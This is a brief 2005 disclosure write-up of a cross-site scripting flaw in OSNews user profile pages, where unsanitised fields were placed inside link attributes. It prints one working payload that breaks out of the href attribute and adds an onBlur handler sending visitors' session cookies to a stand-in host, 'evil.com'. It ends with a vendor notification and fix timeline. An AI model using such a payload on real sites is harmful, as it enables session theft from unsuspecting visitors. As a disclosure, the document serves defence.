About OSNews

OSNews.com is a website which contains links to news stories, and facilitates discussion upon them.

The software used upon the site was recently upgraded, and the use of "user accounts" was introduced.

These changes are described by a news article posted upon the site.

The Security Hole

Each registered user has their own profile page, which is linked to by any comments they leave.

This user page contains several fields which the owner may fill out, for example a homepage URL, a location, etc. Here's a link to to a my profile which should illustrate their appearance..

Unfortunately the information the owner entered were not adequately sanitized prior to display.

For each field the user entered a clickable link was constructed, of the form:

<a href="UserInput">UserInput</a>

This allowed a malicious user to enter something such as:

http://somesite.com" onBlur="document.location='evil.com'+document.cookie;

This entry would then allow visitors to have their session cookies stolen simply by "mousing over" the improperly sanitised URL.

Timeline

Vendor notified: Wed, 6 Jul 2005 17:44:27 +0100
FixedWed, 6 Jul 2005 12:50:39 -0400